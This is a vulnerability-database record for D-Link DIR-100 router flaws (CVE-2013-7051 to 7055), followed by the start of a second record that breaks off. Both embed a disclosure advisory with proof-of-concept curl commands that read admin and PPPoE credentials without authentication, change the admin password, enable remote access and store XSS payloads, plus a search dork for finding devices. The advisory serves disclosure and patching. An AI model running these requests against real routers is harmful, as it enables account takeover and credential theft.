        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01477"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007143"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7053"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Felix Richter",
    "sources": [
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2013-7053",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CVE-2013-7053",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 6.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2014-01477",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2013-7053",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2013-7053",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-7053",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-7053",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2014-01477",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202002-036",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01477"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007143"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-036"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7053"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-100 Contains a cross-site request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. D-Link DIR-100 Ethernet Broadband Router has a cross-site request forgery vulnerability that allows remote attackers to build malicious URIs, entice users to resolve, and perform malicious operations in the target user context, such as changing administrator passwords. D-Link DIR-100 is prone to the following security vulnerabilities:\n1. An authentication-bypass vulnerability\n2. Multiple information-disclosure vulnerabilities\n3. A cross-site request-forgery vulnerability\n4. A cross-site scripting vulnerability\nAn attacker can exploit these issues to execute HTML and arbitrary  script code in the browser of an unsuspecting user in the context of the  affected device, steal cookie-based authentication credentials,  bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. 
* Title: Router D-Link DIR-100 Multiple Vulnerabilities\n* Date: 2013-12-18\n* Author: Felix Richter\n* Contact: root@euer.krebsco.de\n* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip\n* Patched Software:    ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip\n* Report Version: 2.0\n* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt\n* Vulnerable: D-Link DIR-100\n    * Hardware Revision: D1\n    * Software Version: 4.03B07 (from 2012-04-10)\n* CVE Numbers: \n    * CWE-287 Authentication Issues:             CVE-2013-7051\n    * CWE-255 Issues with Credential Management: CVE-2013-7052\n    * CWE-352 Cross-Site Request Forgery:        CVE-2013-7053\n    * CWE-79  Cross-Site Scripting:              CVE-2013-7054\n    * CWE-200 Information Disclosure:            CVE-2013-7055\n* Google Dork: \"D-Link Systems\" inurl:bsc_internet.htm D1\n* State: Patched by Vendor\n* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8\n\n# Table of Contents\n\n    1. Background\n    2. Technical Description\n    4. Severity and Remediation\n    5. Timeline\n\n# 1. Background\n\nThe DIR-100 is designed for easy and robust connectivity among heterogeneous\nstandards-based network devices. Computers can communicate directly with this\nrouter for automatic opening and closing of UDP/TCP ports to take full\nadvantage of the security provided without sacrificing functionality of on-line\napplications. 
\n\n# 2 Vulnerability Description\n\nMultiple vulnerabilities have been found in the D-Link DIR-100 Ethernet\nBroadband Router Revision D (and potentially other devices sharing the \naffected firmware) that could allow a remote attacker:\n\n - Retrieve the Administrator password without authentication leading to\n   authentication bypass [CWE-255]\n - Retrieve sensitive configuration paramters like the pppoe username and\n   password without authentication [CWE-200]\n - Execute privileged Commands without authentication through a race\n   condition leading to weak authentication enforcement [CWE-287]\n - Sending formatted request to a victim which then will execute arbitrary\n   commands on the device (CSRF) [CWE-352]\n - Store arbitrary javascript code which will be executed when a victim\n   accesses the administrator interface [CWE-79]\n\nCVE-Numbers for these vulnerabilities has not yet been assigned. \n\n# 3 Technical Description of the Vulnerabilities\n\n## 3.0 The DIR-100 Web Interface and CGI\n\nThe DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for\nunauthenticated users and `/cli.cgi` for authenticated requests. \n\nlist of features provided by each cgi-script can be retrieved by:\n\n    curl \u0027http://192.168.1.104/cliget.cgi?cmd=help\u0027\n    # and respectively when authenticated\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=help\u0027\n\n## 3.1 Authentication Bypass\n\n### Description\n\nThe administrator password is not protected in any way on the device, every\nattacker with access to the administrator interface which listens on port 80. \nFor retrieving the Administrator password the request must not be\nauthenticated. 
\n\n\n### Proof of Concept\n\nThe web interface provides two distinct ways to retrieve the adminstrator\npassword:\n\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027\n\n## 3.2 Weak Authentication\n\n### Description\n\nAs soon as a user is logged into the administration interface, the cli CGI\nis `unlocked` and can be used by without authenticating before as\nthe cgi-script does not check any other authentication parameters such as\ncookies or HTTP Parameters. The only access check is if the IP-Address is \nthe same. \n\n### Proof of Concept\n    \n    # open the router interface in a web browser and log in\n    firefox  \u0027http://192.168.0.1/\u0027 \n    \n    # open a new terminal or another web-browser which is currently not logged\n    # in and try to access\n\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=help\u0027\n\n    # this request will be authenticated and it will not be redirected to the\n    # login page. If no user is logged in, the request will be redirected to\n    # the login \n\n## 3.3 Retrieve sensitive information\n\n### Description\n\nBesides retrieving the administrator password without authentication it is\npossible to retrieve other sensitive configuration from the device as well like\nthe PPTP and poe Username and Password, as well as the configured dyndns\nusername and password and configured mail log credentials when these parameters\nare configured. \nNo authentication is requred. 
\n\n### Proof of Concept\n\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027\n\n## 3.4 Cross-Site Request Forgery (CSRF)\n\n### Description\n\nCSRF attacks can be launched by sending a formatted request to a victim, then\ntricking the victim into loading the request (often automatically), which\nmakes it appear that the request came from the victim. As an example the\nattacker could change the administrator password (see Proof of Concept code)\nand enable system remote access. \n\n### Proof of Concept\n\nChanging the password for administrator can be done when the ip-address is\nauthenticated:\n\n    # Log into DIR-100\n    curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n    # Change password\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passHash=4%25;commit\u0027\n\n    # enable remote console\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027\n\n## 3.5 Cross-Site Scripting (XSS)\n\n### Description\n\nIt is possible for an authenticated user to store information on the server\nwhich will not be checked on the server side for special characters which\nresults in persistent Cross-Site Scripting Vulnerabilities. With this\nvulnerabilty the victim (administrator) will run javascript code in the \ncontext of the D-Link DIR-100. 
\n\nXSS is possible because only on the client side (javascript code) the input is\nfiltered and validated, sending data directly to the CGI scripts. \n\n### Proof of Concept\n\n    # Log into DIR-100\n    curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n    #  XSS in Static IP Address Tab\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027\n\n    # XSS in Scheduler tab\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027\n\n# 4 Severity and Remediation\n\nThis exploits are considered very critical, especially when the feature of remote\nadministration is activated on the system.  \nWeak authentication, together with cross-site request forgery and authentication \nbypass can result in a full device compromise from an arbitrary website the victim is\naccessing, even if the device has remote administration deactivated on the\ninternet-port. It is recommended to upgrade the router with the newest firmware\nof the D-Link DIR-100. \n\n# 5 Timeline\n\n2013-09-13 - First Contact with D-Link Support\n2013-09-19 - Sent Report\n2013-10-14 - Request Status update, Response: Beta will be available mid October\n2013-12-02 - Vendor publishes Firmware Update \n2013-12-11 - Request CVE-IDs\n2013-12-18 - Publish the report\n",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007143"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-01477"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-7053",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "65290",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007143",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-01477",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-036",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "125041",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01477"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007143"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-036"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7053"
      }
    ]
  },
  "id": "VAR-202002-0668",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01477"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01477"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:36:11.585000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top\u00a0Page",
        "trust": 0.8,
        "url": "http://www.dlink.lt/en/"
      },
      {
        "title": "Patch for D-Link DIR-100 Cross-Site Request Forgery Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/44083"
      },
      {
        "title": "D-Link DIR-100 Fixes for cross-site request forgery vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107308"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01477"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007143"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-036"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-352",
        "trust": 1.0
      },
      {
        "problemtype": "Cross-site request forgery (CWE-352) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007143"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7053"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905"
      },
      {
        "trust": 2.3,
        "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
      },
      {
        "trust": 1.6,
        "url": "https://www.securityfocus.com/bid/65290/info"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7053"
      },
      {
        "trust": 0.4,
        "url": "http://more.dlink.de/sicherheit/news.html#news8"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/fulldisclosure/2014/feb/4"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=help\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7052"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7051"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cliget.cgi?cmd=help\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/login.htm\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7055"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passhash=4%25;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7054"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=help\u0027"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01477"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007143"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-036"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7053"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01477"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007143"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-036"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7053"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-01477"
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "65290"
      },
      {
        "date": "2020-02-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007143"
      },
      {
        "date": "2014-02-03T23:36:22",
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "date": "2020-02-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202002-036"
      },
      {
        "date": "2020-02-04T14:15:11.777000",
        "db": "NVD",
        "id": "CVE-2013-7053"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-01477"
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "65290"
      },
      {
        "date": "2020-02-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007143"
      },
      {
        "date": "2022-07-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202002-036"
      },
      {
        "date": "2024-11-21T02:00:14.800000",
        "db": "NVD",
        "id": "CVE-2013-7053"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-036"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-100 Cross-Site Request Forgery Vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01477"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-036"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "cross-site request forgery",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-036"
      }
    ],
    "trust": 0.6
  }
}

var-202002-0670
Vulnerability from variot

D-Link DIR-100 4.03B07 has PPTP and poe information disclosure. D-Link DIR-100 contains a vulnerability related to insufficient protection of credentials. Information may be obtained or tampered with, and a denial-of-service (DoS) condition may result. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router fails to properly restrict access, allowing remote attackers to submit requests without verification and obtain information such as the PPTP, POE, and Dyndns usernames and passwords. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability. An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass the authentication mechanism, and gain access to potentially sensitive information. Other attacks are also possible.
* Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8

Table of Contents

1. Background
2. Vulnerability Description
3. Technical Description of the Vulnerabilities
4. Severity and Remediation
5. Timeline

1. Background

The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.

2 Vulnerability Description

Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker to:

  • Retrieve the administrator password without authentication, leading to authentication bypass [CWE-255]
  • Retrieve sensitive configuration parameters, such as the pppoe username and password, without authentication [CWE-200]
  • Execute privileged commands without authentication through a race condition, leading to weak authentication enforcement [CWE-287]
  • Send a formatted request to a victim which will then execute arbitrary commands on the device (CSRF) [CWE-352]
  • Store arbitrary JavaScript code which will be executed when a victim accesses the administrator interface [CWE-79]

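CVE numbers for these vulnerabilities have not yet been assigned. (This sentence appears to predate report version 2.0: the report header above lists CVE-2013-7051 through CVE-2013-7055.)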

3 Technical Description of the Vulnerabilities

3.0 The DIR-100 Web Interface and CGI

The DIR-100 Web interface provides a cgi-script on /cliget.cgi for unauthenticated users and /cli.cgi for authenticated requests.

A list of the features provided by each cgi-script can be retrieved with:

curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'

3.1 Authentication Bypass

Description

The administrator password is not protected in any way on the device: every attacker with access to the administrator interface, which listens on port 80, can retrieve it. The request that retrieves the administrator password does not need to be authenticated.

Proof of Concept

The web interface provides two distinct ways to retrieve the administrator password:

curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'

3.2 Weak Authentication

Description

As soon as a user is logged into the administration interface, the cli CGI is unlocked and can be used without prior authentication, because the cgi-script does not check any other authentication parameters such as cookies or HTTP parameters. The only access check is whether the IP address is the same.

Proof of Concept

# open the router interface in a web browser and log in
firefox  'http://192.168.0.1/'

# open a new terminal or another web-browser which is currently not logged
# in and try to access

curl 'http://192.168.0.1/cli.cgi?cmd=help'

# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login

3.3 Retrieve sensitive information

Description

Besides the administrator password, other sensitive configuration can also be retrieved from the device without authentication: the PPTP and poe username and password, the configured dyndns username and password, and the mail log credentials, when these parameters are configured. No authentication is required.

Proof of Concept

curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'

3.4 Cross-Site Request Forgery (CSRF)

Description

CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access.

Proof of Concept

Changing the password for administrator can be done when the ip-address is authenticated:

# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'

# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'

# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'

3.5 Cross-Site Scripting (XSS)

Description

An authenticated user can store information on the server that is not checked on the server side for special characters, which results in persistent Cross-Site Scripting vulnerabilities. With this vulnerability the victim (administrator) will run JavaScript code in the context of the D-Link DIR-100.

XSS is possible because input is filtered and validated only on the client side (JavaScript code); data sent directly to the CGI scripts is not subject to these checks.

Proof of Concept

# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'

#  XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='

# XSS in Scheduler tab
